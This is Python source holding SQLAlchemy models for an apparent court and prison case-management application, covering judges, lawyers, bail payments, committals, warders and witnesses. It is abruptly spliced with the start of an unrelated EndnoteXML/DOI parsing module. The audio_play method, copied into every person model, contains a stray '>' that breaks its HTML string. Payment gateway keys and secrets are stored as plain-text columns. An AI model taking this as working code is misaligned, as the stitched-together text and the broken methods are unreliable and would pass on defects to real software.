backref=u'investigations')
witness = relationship(
u'Witnes', secondary='investigation_witness', backref=u'investigations')
investigation_polofficer = Table('investigation_polofficer', Model.metadata,
Column(
'investigation',
ForeignKey(u'investigation.id'),
primary_key=True,
nullable=False),
Column(
'polofficer',
ForeignKey(u'polofficer.id'),
primary_key=True,
nullable=False,
index=True))
investigation_witness = Table('investigation_witness', Model.metadata,
Column(
'investigation',
ForeignKey(u'investigation.id'),
primary_key=True,
nullable=False),
Column(
'witness',
ForeignKey(u'witness.id'),
primary_key=True,
nullable=False,
index=True))
class JoRank(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'jo_rank'
id = Column(Integer, primary_key=True, autoincrement=True)
appelation = Column(Text, nullable=False)
informaladdress = Column(Text, nullable=False)
class Judicialofficer(PersonMixin, ContactMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'judicialofficer'
def ViewName(self):
return self.__class__.__name__ + 'View'
def photo_img(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' + im.get_url(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def photo_img_thumbnail(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' +
im.get_url_thumbnail(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def print_button(self):
vn = self.ViewName()
#pdf = render_pdf(url_for(vn, pk=str(self.id)))
#pdf = pdfkit.from_string(url_for(vn, pk=str(self.id)))
#response = make_response(pdf)
#response.headers['Content-Type'] = 'application/pdf'
#response.headers['Content-Disposition'] = 'inline; filename=output.pdf'
return Markup(
'<a href="' + url_for(vn) +
'" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
+ 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')
def audio_play(self):
vn = self.ViewName()
return Markup(
'<audio controls autoplay>' + '<source src="' + url_for(vn) +
'" type="audio/mpeg"' > + '<i class="fa fa-volume-up"></i>' +
'Your browser does not support the audio element.' + '</audio>')
# edit_form_extra_fields = {'field2': TextField('field2',
# widget=BS3TextFieldROWidget())}
id = Column(Integer, primary_key=True, autoincrement=True)
j_o__rank = Column(ForeignKey(u'jo_rank.id'), nullable=False, index=True)
gender = Column(ForeignKey(u'gender.id'), index=True)
court = Column(ForeignKey(u'court.id'), nullable=False, index=True)
court1 = relationship(
u'Court',
primaryjoin='Judicialofficer.court == Court.id',
backref=u'judicialofficers')
gender1 = relationship(
u'Gender',
primaryjoin='Judicialofficer.gender == Gender.id',
backref=u'judicialofficers')
jo_rank = relationship(
u'JoRank',
primaryjoin='Judicialofficer.j_o__rank == JoRank.id',
backref=u'judicialofficers')
class Lawfirm(PlaceMixin, RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'lawfirm'
id = Column(Integer, primary_key=True, autoincrement=True)
class Lawyer(PersonMixin, ContactMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'lawyers'
def ViewName(self):
return self.__class__.__name__ + 'View'
def photo_img(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' + im.get_url(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def photo_img_thumbnail(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' +
im.get_url_thumbnail(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def print_button(self):
vn = self.ViewName()
#pdf = render_pdf(url_for(vn, pk=str(self.id)))
#pdf = pdfkit.from_string(url_for(vn, pk=str(self.id)))
#response = make_response(pdf)
#response.headers['Content-Type'] = 'application/pdf'
#response.headers['Content-Disposition'] = 'inline; filename=output.pdf'
return Markup(
'<a href="' + url_for(vn) +
'" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
+ 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')
def audio_play(self):
vn = self.ViewName()
return Markup(
'<audio controls autoplay>' + '<source src="' + url_for(vn) +
'" type="audio/mpeg"' > + '<i class="fa fa-volume-up"></i>' +
'Your browser does not support the audio element.' + '</audio>')
# edit_form_extra_fields = {'field2': TextField('field2',
# widget=BS3TextFieldROWidget())}
id = Column(Integer, primary_key=True, autoincrement=True)
gender = Column(ForeignKey(u'gender.id'), index=True)
barnumber = Column(String(20))
law_firm = Column(ForeignKey(u'lawfirm.id'), index=True)
admissiondate = Column(Date)
gender1 = relationship(
u'Gender', primaryjoin='Lawyer.gender == Gender.id', backref=u'lawyers')
lawfirm = relationship(
u'Lawfirm',
primaryjoin='Lawyer.law_firm == Lawfirm.id',
backref=u'lawyers')
class Medevent(ActivityMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'medevent'
id = Column(Integer, primary_key=True, autoincrement=True)
class Natureofsuit(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'natureofsuit'
id = Column(Integer, primary_key=True, autoincrement=True)
class Payment(AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'payment'
id = Column(Integer, primary_key=True, autoincrement=True)
datepaid = Column(DateTime, default=func.now())
amount = Column(Numeric(12, 2))
paymentreference = Column(String(80), nullable=False)
paymentconfirmed = Column(Boolean)
paidby = Column(Text, nullable=False)
msisdn = Column(Text)
receiptnumber = Column(String(100), nullable=False)
ispartial = Column(Boolean)
bail = Column(ForeignKey(u'bail.id'), nullable=False, index=True)
billrefnumber = Column(Text, nullable=False)
payment_method = Column(
ForeignKey(u'paymentmethod.id'), nullable=False, index=True)
paymentdescription = Column(Text, nullable=False)
case = Column(ForeignKey(u'case.id'), index=True)
bail1 = relationship(
u'Bail', primaryjoin='Payment.bail == Bail.id', backref=u'payments')
case1 = relationship(
u'Case', primaryjoin='Payment.case == Case.id', backref=u'payments')
paymentmethod = relationship(
u'Paymentmethod',
primaryjoin='Payment.payment_method == Paymentmethod.id',
backref=u'payments')
class Paymentmethod(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'paymentmethod'
id = Column(Integer, primary_key=True, autoincrement=True)
key = Column(Text, nullable=False)
secret = Column(Text, nullable=False)
portal = Column(Text, nullable=False)
tillnumber = Column(Text, nullable=False)
shortcode = Column(Text, nullable=False)
class Plaintiff(PersonMixin, ContactMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'plaintiff'
def ViewName(self):
return self.__class__.__name__ + 'View'
def photo_img(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' + im.get_url(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def photo_img_thumbnail(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' +
im.get_url_thumbnail(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def print_button(self):
vn = self.ViewName()
#pdf = render_pdf(url_for(vn, pk=str(self.id)))
#pdf = pdfkit.from_string(url_for(vn, pk=str(self.id)))
#response = make_response(pdf)
#response.headers['Content-Type'] = 'application/pdf'
#response.headers['Content-Disposition'] = 'inline; filename=output.pdf'
return Markup(
'<a href="' + url_for(vn) +
'" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
+ 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')
def audio_play(self):
vn = self.ViewName()
return Markup(
'<audio controls autoplay>' + '<source src="' + url_for(vn) +
'" type="audio/mpeg"' > + '<i class="fa fa-volume-up"></i>' +
'Your browser does not support the audio element.' + '</audio>')
# edit_form_extra_fields = {'field2': TextField('field2',
# widget=BS3TextFieldROWidget())}
id = Column(Integer, primary_key=True, autoincrement=True)
gender = Column(ForeignKey(u'gender.id'), index=True)
juvenile = Column(Boolean)
gender1 = relationship(
u'Gender',
primaryjoin='Plaintiff.gender == Gender.id',
backref=u'plaintiffs')
class Policerank(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'policerank'
id = Column(Integer, primary_key=True, autoincrement=True)
class Policerole(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'policerole'
id = Column(Integer, primary_key=True, autoincrement=True)
polofficer = relationship(
u'Polofficer',
secondary='polofficer_policerole',
backref=u'policeroles')
class Policestation(PlaceMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'policestation'
id = Column(Integer, primary_key=True, autoincrement=True)
town = Column(ForeignKey(u'town.id'), nullable=False, index=True)
officercommanding = Column(String(100))
police_station_type = Column(
ForeignKey(u'policestationtype.id'), nullable=False, index=True)
policestationtype = relationship(
u'Policestationtype',
primaryjoin='Policestation.police_station_type == Policestationtype.id',
backref=u'policestations')
town1 = relationship(
u'Town',
primaryjoin='Policestation.town == Town.id',
backref=u'policestations')
class Policestationtype(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'policestationtype'
id = Column(Integer, primary_key=True, autoincrement=True)
class Polofficer(AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'polofficer'
id = Column(Integer, primary_key=True, autoincrement=True)
police_rank = Column(
ForeignKey(u'policerank.id'), nullable=False, index=True)
gender = Column(ForeignKey(u'gender.id'), nullable=False, index=True)
servicenumber = Column(Text)
reports_to = Column(ForeignKey(u'polofficer.id'), index=True)
pol_supervisor = Column(ForeignKey(u'case.id'), nullable=False, index=True)
postdate = Column(Date)
gender1 = relationship(
u'Gender',
primaryjoin='Polofficer.gender == Gender.id',
backref=u'polofficers')
case = relationship(
u'Case',
primaryjoin='Polofficer.pol_supervisor == Case.id',
backref=u'polofficers')
policerank = relationship(
u'Policerank',
primaryjoin='Polofficer.police_rank == Policerank.id',
backref=u'polofficers')
parent = relationship(
u'Polofficer',
remote_side=[id],
primaryjoin='Polofficer.reports_to == Polofficer.id',
backref=u'polofficers')
polofficer_policerole = Table('polofficer_policerole', Model.metadata,
Column(
'polofficer',
ForeignKey(u'polofficer.id'),
primary_key=True,
nullable=False),
Column(
'policerole',
ForeignKey(u'policerole.id'),
primary_key=True,
nullable=False,
index=True))
class Prison(PlaceMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'prison'
id = Column(Integer, primary_key=True, autoincrement=True)
town = Column(ForeignKey(u'town.id'), nullable=False, index=True)
warden = Column(String(100))
capacity = Column(Integer)
population = Column(Integer)
cellcount = Column(Integer)
gatecount = Column(Integer)
town1 = relationship(
u'Town', primaryjoin='Prison.town == Town.id', backref=u'prisons')
securityrank = relationship(
u'Securityrank', secondary='prison_securityrank', backref=u'prisons')
prison_securityrank = Table('prison_securityrank', Model.metadata,
Column(
'prison',
ForeignKey(u'prison.id'),
primary_key=True,
nullable=False),
Column(
'securityrank',
ForeignKey(u'securityrank.id'),
primary_key=True,
nullable=False,
index=True))
class Prisoncell(AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'prisoncell'
id = Column(Integer, primary_key=True, autoincrement=True)
prison = Column(ForeignKey(u'prison.id'), nullable=False, index=True)
prison1 = relationship(
u'Prison',
primaryjoin='Prisoncell.prison == Prison.id',
backref=u'prisoncells')
class Prisoncommital(ActivityMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'prisoncommital'
prison = Column(ForeignKey(u'prison.id'), primary_key=True, nullable=False)
warrantno = Column(String(100), primary_key=True, nullable=False)
defendant = Column(ForeignKey(u'defendant.id'), nullable=False, index=True)
hearing = Column(ForeignKey(u'hearing.id'), nullable=False, index=True)
warrantdate = Column(DateTime, default=func.now())
hascourtdate = Column(Boolean)
judicial_officer_warrant = Column(
ForeignKey(u'judicialofficer.id'), nullable=False, index=True)
warrant = Column(Text, nullable=False)
warrantduration = Column(Integer, nullable=False, default=7)
warrantexpiry = Column(DateTime)
@observes("warrantdate", "warrantduration")
def warrant_expiration_observer(self, warrantdate, warrantduration):
self.warrantexpiry = warrantdate + datetime.timedelta(warrantduration)
history = Column(Text, nullable=False)
earliestrelease = Column(Date)
releasedate = Column(DateTime)
property = Column(Text)
itemcount = Column(Integer)
releasenotes = Column(Text)
commitalnotes = Column(Text)
police_officer_commiting = Column(
ForeignKey(u'polofficer.id'), nullable=False, index=True)
paroledate = Column(Date)
escaped = Column(Boolean)
escapedate = Column(DateTime)
escapedetails = Column(Text)
defendant1 = relationship(
u'Defendant',
primaryjoin='Prisoncommital.defendant == Defendant.id',
backref=u'prisoncommitals')
hearing1 = relationship(
u'Hearing',
primaryjoin='Prisoncommital.hearing == Hearing.id',
backref=u'prisoncommitals')
judicialofficer = relationship(
u'Judicialofficer',
primaryjoin=
'Prisoncommital.judicial_officer_warrant == Judicialofficer.id',
backref=u'prisoncommitals')
polofficer = relationship(
u'Polofficer',
primaryjoin='Prisoncommital.police_officer_commiting == Polofficer.id',
backref=u'prisoncommitals')
prison1 = relationship(
u'Prison',
primaryjoin='Prisoncommital.prison == Prison.id',
backref=u'prisoncommitals')
warder = relationship(
u'Warder',
secondary='prisoncommital_warder',
backref=u'prisoncommitals')
prisoncommital_warder = Table(
'prisoncommital_warder', Model.metadata,
Column('prisoncommital_prison', Integer, primary_key=True, nullable=False),
Column(
'prisoncommital_warrantno',
String(100),
primary_key=True,
nullable=False),
Column(
'warder',
ForeignKey(u'warder.id'),
primary_key=True,
nullable=False,
index=True),
ForeignKeyConstraint(
['prisoncommital_prison', 'prisoncommital_warrantno'],
[u'prisoncommital.prison', u'prisoncommital.warrantno']))
class Prisonerproperty(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'prisonerproperty'
__table_args__ = (ForeignKeyConstraint([
'prison_commital_prison', 'prison_commital_warrantno'
], [u'prisoncommital.prison', u'prisoncommital.warrantno']), Index(
'idx_prisonerproperty__prison_commital_prison_prison_commital_wa',
'prison_commital_prison', 'prison_commital_warrantno'))
id = Column(Integer, primary_key=True, autoincrement=True)
prison_commital_prison = Column(Integer, nullable=False)
prison_commital_warrantno = Column(String(100), nullable=False)
receipted = Column(Boolean)
prisoncommital = relationship(
u'Prisoncommital',
primaryjoin=
'and_(Prisonerproperty.prison_commital_prison == Prisoncommital.prison, Prisonerproperty.prison_commital_warrantno == Prisoncommital.warrantno)',
backref=u'prisonerproperties')
class Prosecutor(PersonMixin, ContactMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'prosecutor'
def ViewName(self):
return self.__class__.__name__ + 'View'
def photo_img(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' + im.get_url(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def photo_img_thumbnail(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' +
im.get_url_thumbnail(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def print_button(self):
vn = self.ViewName()
#pdf = render_pdf(url_for(vn, pk=str(self.id)))
#pdf = pdfkit.from_string(url_for(vn, pk=str(self.id)))
#response = make_response(pdf)
#response.headers['Content-Type'] = 'application/pdf'
#response.headers['Content-Disposition'] = 'inline; filename=output.pdf'
return Markup(
'<a href="' + url_for(vn) +
'" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
+ 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')
def audio_play(self):
vn = self.ViewName()
return Markup(
'<audio controls autoplay>' + '<source src="' + url_for(vn) +
'" type="audio/mpeg"' > + '<i class="fa fa-volume-up"></i>' +
'Your browser does not support the audio element.' + '</audio>')
# edit_form_extra_fields = {'field2': TextField('field2',
# widget=BS3TextFieldROWidget())}
id = Column(Integer, primary_key=True, autoincrement=True)
gender = Column(ForeignKey(u'gender.id'), index=True)
gender1 = relationship(
u'Gender',
primaryjoin='Prosecutor.gender == Gender.id',
backref=u'prosecutors')
prosecutorteam = relationship(
u'Prosecutorteam',
secondary='prosecutor_prosecutorteam',
backref=u'prosecutors')
prosecutor_prosecutorteam = Table('prosecutor_prosecutorteam', Model.metadata,
Column(
'prosecutor',
ForeignKey(u'prosecutor.id'),
primary_key=True,
nullable=False),
Column(
'prosecutorteam',
ForeignKey(u'prosecutorteam.id'),
primary_key=True,
nullable=False,
index=True))
class Prosecutorteam(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'prosecutorteam'
id = Column(Integer, primary_key=True, autoincrement=True)
class Remission(AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'remission'
__table_args__ = (ForeignKeyConstraint([
'prison_commital_prison', 'prison_commital_warrantno'
], [u'prisoncommital.prison', u'prisoncommital.warrantno']), Index(
'idx_remission__prison_commital_prison_prison_commital_warrantno',
'prison_commital_prison', 'prison_commital_warrantno'))
id = Column(Integer, primary_key=True, autoincrement=True)
prison_commital_prison = Column(Integer, nullable=False)
prison_commital_warrantno = Column(String(100), nullable=False)
daysearned = Column(Integer)
dateearned = Column(Date)
amount = Column(Numeric(12, 2))
prisoncommital = relationship(
u'Prisoncommital',
primaryjoin=
'and_(Remission.prison_commital_prison == Prisoncommital.prison, Remission.prison_commital_warrantno == Prisoncommital.warrantno)',
backref=u'remissions')
class Securityrank(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'securityrank'
id = Column(Integer, primary_key=True, autoincrement=True)
def __repr__(self):
return self.name
class Subcounty(AuditMixin, RefTypeMixin, Model):
__versioned__ = {}
__tablename__ = 'subcounty'
id = Column(Integer, primary_key=True, autoincrement=True)
county = Column(ForeignKey(u'county.id'), nullable=False, index=True)
county1 = relationship(
u'County',
primaryjoin='Subcounty.county == County.id',
backref=u'subcounty')
def __repr__(self):
return self.name
class Surety(PersonMixin, ContactMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'surety'
def ViewName(self):
return self.__class__.__name__ + 'View'
def photo_img(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' + im.get_url(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def photo_img_thumbnail(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' +
im.get_url_thumbnail(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def print_button(self):
vn = self.ViewName()
#pdf = render_pdf(url_for(vn, pk=str(self.id)))
#pdf = pdfkit.from_string(url_for(vn, pk=str(self.id)))
#response = make_response(pdf)
#response.headers['Content-Type'] = 'application/pdf'
#response.headers['Content-Disposition'] = 'inline; filename=output.pdf'
return Markup(
'<a href="' + url_for(vn) +
'" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
+ 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')
def audio_play(self):
vn = self.ViewName()
return Markup(
'<audio controls autoplay>' + '<source src="' + url_for(vn) +
'" type="audio/mpeg"' > + '<i class="fa fa-volume-up"></i>' +
'Your browser does not support the audio element.' + '</audio>')
# edit_form_extra_fields = {'field2': TextField('field2',
# widget=BS3TextFieldROWidget())}
id = Column(Integer, primary_key=True, autoincrement=True)
gender = Column(ForeignKey(u'gender.id'), index=True)
gender1 = relationship(
u'Gender',
primaryjoin='Surety.gender == Gender.id',
backref=u'sureties')
class Tag(AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'tag'
id = Column(Integer, primary_key=True, autoincrement=True)
def __repr__(self):
return self.name
class Town(AuditMixin, RefTypeMixin, Model):
__versioned__ = {}
__tablename__ = 'town'
id = Column(Integer, primary_key=True, autoincrement=True)
subcounty = Column(ForeignKey(u'subcounty.id'), nullable=False, index=True)
subcounty1 = relationship(
u'Subcounty',
primaryjoin='Town.subcounty == Subcounty.id',
backref=u'towns')
def __repr__(self):
return self.name
class Visit(ActivityMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'visit'
vistors = Column(
ForeignKey(u'visitor.id'), primary_key=True, nullable=False)
defendants = Column(
ForeignKey(u'defendant.id'),
primary_key=True,
nullable=False,
index=True)
visitdate = Column(DateTime, default=func.now())
visitnotes = Column(Text)
visitduration = Column(INTERVAL)
defendant = relationship(
u'Defendant',
primaryjoin='Visit.defendants == Defendant.id',
backref=u'visits')
visitor = relationship(
u'Visitor',
primaryjoin='Visit.vistors == Visitor.id',
backref=u'visits')
class Visitor(PersonMixin, ContactMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'visitor'
def ViewName(self):
return self.__class__.__name__ + 'View'
def photo_img(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' + im.get_url(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def photo_img_thumbnail(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' +
im.get_url_thumbnail(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def print_button(self):
vn = self.ViewName()
#pdf = render_pdf(url_for(vn, pk=str(self.id)))
#pdf = pdfkit.from_string(url_for(vn, pk=str(self.id)))
#response = make_response(pdf)
#response.headers['Content-Type'] = 'application/pdf'
#response.headers['Content-Disposition'] = 'inline; filename=output.pdf'
return Markup(
'<a href="' + url_for(vn) +
'" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
+ 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')
def audio_play(self):
vn = self.ViewName()
return Markup(
'<audio controls autoplay>' + '<source src="' + url_for(vn) +
'" type="audio/mpeg"' > + '<i class="fa fa-volume-up"></i>' +
'Your browser does not support the audio element.' + '</audio>')
# edit_form_extra_fields = {'field2': TextField('field2',
# widget=BS3TextFieldROWidget())}
id = Column(Integer, primary_key=True, autoincrement=True)
gender = Column(ForeignKey(u'gender.id'), nullable=False, index=True)
gender1 = relationship(
u'Gender',
primaryjoin='Visitor.gender == Gender.id',
backref=u'visitors')
class Warder(PersonMixin, ContactMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'warder'
def ViewName(self):
return self.__class__.__name__ + 'View'
def photo_img(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' + im.get_url(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def photo_img_thumbnail(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' +
im.get_url_thumbnail(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def print_button(self):
vn = self.ViewName()
#pdf = render_pdf(url_for(vn, pk=str(self.id)))
#pdf = pdfkit.from_string(url_for(vn, pk=str(self.id)))
#response = make_response(pdf)
#response.headers['Content-Type'] = 'application/pdf'
#response.headers['Content-Disposition'] = 'inline; filename=output.pdf'
return Markup(
'<a href="' + url_for(vn) +
'" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
+ 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')
def audio_play(self):
vn = self.ViewName()
return Markup(
'<audio controls autoplay>' + '<source src="' + url_for(vn) +
'" type="audio/mpeg"' > + '<i class="fa fa-volume-up"></i>' +
'Your browser does not support the audio element.' + '</audio>')
# edit_form_extra_fields = {'field2': TextField('field2',
# widget=BS3TextFieldROWidget())}
id = Column(Integer, primary_key=True, autoincrement=True)
prison = Column(ForeignKey(u'prison.id'), nullable=False, index=True)
warder_rank = Column(
ForeignKey(u'warderrank.id'), nullable=False, index=True)
reports_to = Column(ForeignKey(u'warder.id'), index=True)
prison1 = relationship(
u'Prison', primaryjoin='Warder.prison == Prison.id', backref=u'warders')
parent = relationship(
u'Warder',
remote_side=[id],
primaryjoin='Warder.reports_to == Warder.id',
backref=u'warders')
warderrank = relationship(
u'Warderrank',
primaryjoin='Warder.warder_rank == Warderrank.id',
backref=u'warders')
class Warderrank(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'warderrank'
id = Column(Integer, primary_key=True, autoincrement=True)
class Witnes(PersonMixin, ContactMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'witness'
def ViewName(self):
return self.__class__.__name__ + 'View'
def photo_img(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' + im.get_url(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def photo_img_thumbnail(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' +
im.get_url_thumbnail(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def print_button(self):
vn = self.ViewName()
#pdf = render_pdf(url_for(vn, pk=str(self.id)))
#pdf = pdfkit.from_string(url_for(vn, pk=str(self.id)))
#response = make_response(pdf)
#response.headers['Content-Type'] = 'application/pdf'
#response.headers['Content-Disposition'] = 'inline; filename=output.pdf'
return Markup(
'<a href="' + url_for(vn) +
'" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
+ 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')
def audio_play(self):
vn = self.ViewName()
return Markup(
'<audio controls autoplay>' + '<source src="' + url_for(vn) +
'" type="audio/mpeg"' > + '<i class="fa fa-volume-up"></i>' +
'Your browser does not support the audio element.' + '</audio>')
# edit_form_extra_fields = {'field2': TextField('field2',
# widget=BS3TextFieldROWidget())}
id = Column(Integer, primary_key=True, autoincrement=True)
fordefense = Column(Boolean)
gender = Column(ForeignKey(u'gender.id'), nullable=False, index=True)
gender1 = relationship(
u'Gender', primaryjoin='Witnes.gender == Gender.id', backref=u'witness')
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Last Update: 2016.1.25 12:20PM
'''Module for DOI and journal record operation
Also include the journal pdf function'''
import os,sys,re,glob
import time,random,gc
import requests
requests.packages.urllib3.disable_warnings()
from bs4 import BeautifulSoup
try:
from .doi import DOI
from .crrecord import CRrecord
from .basic import normalizeString,strsimilarity,strdiff
except (ImportError,ValueError) as e:
from doi import DOI
from crrecord import CRrecord
from basic import normalizeString,strsimilarity,strdiff
############# Endnote relate libraray ##############
class EndnoteXML(object):
def __init__(self,fname):
if (fname):
f=open(fname)
self.content=re.sub(r'</?style.*?>','',f.read())
f.close()
else:
self.content=""
self.soup=BeautifulSoup(self.content,'html.parser')
self.records=self.soup.records.contents
self.length=len(self.records)
for i in range(self.length):
self.checktag(i,'titles')
self.checktag(i,'authors')
self.checktag(i,'urls')
if (self.records[i].find('related-urls') is None):
self.addtag(i,'related-urls','',parent='urls')
